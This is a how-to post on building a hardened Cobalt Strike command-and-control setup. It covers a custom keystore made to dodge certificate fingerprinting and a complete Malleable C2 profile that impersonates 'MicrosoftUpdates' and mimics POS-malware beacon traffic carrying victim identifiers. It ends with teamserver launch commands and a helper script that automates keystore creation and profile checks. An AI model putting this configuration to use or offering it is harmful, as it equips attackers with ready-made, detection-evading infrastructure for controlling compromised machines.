Configuring a hardened Cobalt Strike C2 profile
1. Generate your own (self-signed) certificate store and stop using cobaltstrike.store
The cobaltstrike.store that the teamserver script creates by default carries a well-known self-signed certificate that defenders fingerprint, so generate your own store instead (this post calls it zzhsec.store). Note that keytool produces a self-signed key pair, not a CA-issued certificate. Command to generate the store file:
keytool -genkey -alias zzhsec -keyalg RSA -validity 36500 -keystore zzhsec.store
Note the value after -alias and the file name after -keystore: both are referenced later in the profile's code-signer block (this post uses zzhsec for both; pick any name, but use the same one throughout). keytool then asks for a keystore password. Remember it, because it also goes into the profile; otherwise you will have to come back and regenerate the store.
keytool next prompts for the distinguished-name fields in turn: first and last name (this becomes the CN; the post enters US), organizational unit, organization, city, state, and a two-letter country code such as US. Answer each prompt; what you enter is what the certificate's DN will contain.
Finally type y to confirm, then enter the key password (press Enter to reuse the keystore password).
ls in the current directory now shows the generated zzhsec.store.

2. Create and edit the C2 profile file
set sample_name "zzhsec POS Malware";
set sleeptime "5000";    # 5 s between callbacks (value is in milliseconds)
set jitter "10";         # 10% jitter on the sleep time
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";

# Self-signed certificate generated for HTTPS listeners
# (independent of the code-signer keystore below)
https-certificate {
    set CN "US";
    set O "MicrosoftUpdates";
    set C "US";          # two-letter ISO country code
    set L "US";
    set OU "MicrosoftUpdates";
    set ST "US";
    set validity "365";
}

# Keystore used to sign generated executables; these three values must match
# the file name, password and alias chosen when the store was created with keytool
code-signer {
    set keystore "zzhsec.store";
    set password "123.zzhsec!";
    set alias "zzhsec";
}

# DNS beacon: address returned when the beacon has nothing to do
set dns_idle "8.8.4.4";
# forced sleep before each individual DNS request (ms)
set dns_sleep "0";
# maximum hostname length when uploading data over DNS [0-255]
set maxdns "235";

http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
    client {
        header "Accept" "text/plain";
        header "Accept-Language" "en-us";
        header "Accept-Encoding" "text/plain";
        header "Content-Type" "application/x-www-form-urlencoded";
        id {
            netbios;
            parameter "id";
        }
        output {
            base64;
            prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
            print;
        }
    }
    server {
        output {
            print;
        }
    }
}

http-get {
    set uri "/updates";
    client {
        metadata {
            netbiosu;
            prepend "user=";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "text/plain";
        output {
            base64;
            print;
        }
    }
}
The https-certificate block only describes the self-signed certificate Cobalt Strike generates for HTTPS listeners; it does not have to match the keystore, which is used only by code-signer. The three code-signer values (keystore, password, alias), however, must match the store exactly. To see the DN you entered when creating the store, run keytool -list -v -keystore zzhsec.store; it prints, for example:
Issuer: CN=US, OU=MicrosoftUpdates, O=MicrosoftUpdates, L=US, ST=US, C=US
Two caveats. First, code-signer does not change the teamserver's own TLS certificate on port 50050, which the teamserver script reads from ./cobaltstrike.store; replace that file (or edit the keytool line in the script) separately, and for HTTPS listeners you can instead point https-certificate at your own store with set keystore and set password. Second, a self-signed store will sign the generated executables, but the signature will not be trusted by Windows; code-signer is meant for a purchased code-signing certificate.
Next, verify that the C2 profile is usable:
Command
./c2lint me.profile
If c2lint reports no errors, start the teamserver:
Command
nohup ./teamserver 1.1.1.1 123456 ./me.profile &
The arguments are the teamserver's external IP, the client password and the profile; replace 1.1.1.1 and 123456 with your own values. Then connect with the client.
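The keystore step and the profile check above, as an added example that is not code from the original post: a POSIX shell script that creates the store non-interactively (keytool's -dname, -storepass and -keypass replace the prompts), reads the code-signer block out of the profile and confirms that the keystore, alias and password named there actually open the store, and flags an https-certificate C value that is not a country code. The function names (profile_setting, make_keystore, check_code_signer, check_cert_country) are mine; it assumes keytool is on PATH, uses the file names zzhsec.store and me.profile and the DN from this post, and the password is a placeholder.

```shell
#!/bin/sh
# Added example (not code from the original post): create the code-signing
# keystore without keytool's interactive prompts, then check that the
# code-signer block of the Malleable C2 profile really matches the store
# before running c2lint and the teamserver.
# Assumptions: keytool is on PATH; the profile is me.profile; store, alias and
# DN are the ones used in the post; the password below is a placeholder.
set -eu

# Print the value of `set KEY "VALUE";` inside top-level block BLOCK of PROFILE
# (code-signer, https-certificate). Accepts both `code-signer{` and `code-signer {`.
profile_setting() {
    profile=$1 block=$2 key=$3
    awk -v blk="$block" -v key="$key" '
        ($1 == blk && $2 == "{") || $1 == (blk "{") { inblk = 1; next }
        inblk && $1 == "}"                          { inblk = 0 }
        inblk && $1 == "set" && $2 == key {
            sub(/^[^"]*"/, ""); sub(/"[[:space:]]*;.*$/, ""); print; exit
        }' "$profile"
}

# Generate the self-signed RSA key pair with the DN supplied up front.
make_keystore() {
    store=$1 ks_alias=$2 pass=$3 dname=$4
    keytool -genkeypair -alias "$ks_alias" -keyalg RSA -keysize 2048 -validity 36500 \
        -keystore "$store" -storepass "$pass" -keypass "$pass" -dname "$dname"
}

# Fail unless the keystore named in code-signer exists and the alias/password
# from the profile open it (keytool -list exits non-zero on a bad password or alias).
check_code_signer() {
    profile=$1
    store=$(profile_setting "$profile" code-signer keystore)
    ks_alias=$(profile_setting "$profile" code-signer alias)
    pass=$(profile_setting "$profile" code-signer password)
    [ -n "$store" ] || { echo "no code-signer keystore in $profile" >&2; return 1; }
    [ -f "$store" ] || { echo "keystore $store not found" >&2; return 1; }
    keytool -list -keystore "$store" -storepass "$pass" -alias "$ks_alias" >/dev/null 2>&1 ||
        { echo "alias=$ks_alias / password in code-signer do not open $store" >&2; return 1; }
    echo "code-signer ok: $store alias=$ks_alias"
}

# C in https-certificate is an ISO 3166 country code, not a language code.
check_cert_country() {
    c=$(profile_setting "$1" https-certificate C)
    case $c in
        [A-Z][A-Z]) return 0 ;;
        *) echo "https-certificate C=\"$c\" is not a two-letter country code" >&2; return 1 ;;
    esac
}

# Stand-alone use: sh check_profile.sh run
if [ "${1:-}" = "run" ]; then
    PASS='replace-me'   # placeholder, not the post's real password
    make_keystore zzhsec.store zzhsec "$PASS" \
        "CN=US, OU=MicrosoftUpdates, O=MicrosoftUpdates, L=US, ST=US, C=US"
    check_code_signer me.profile
    check_cert_country me.profile
    ./c2lint me.profile
fi
```

Run it from the Cobalt Strike directory before c2lint: a mismatch between the store and the code-signer block is caught here with a clear message, instead of surfacing later as a signing failure when artifacts are generated.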

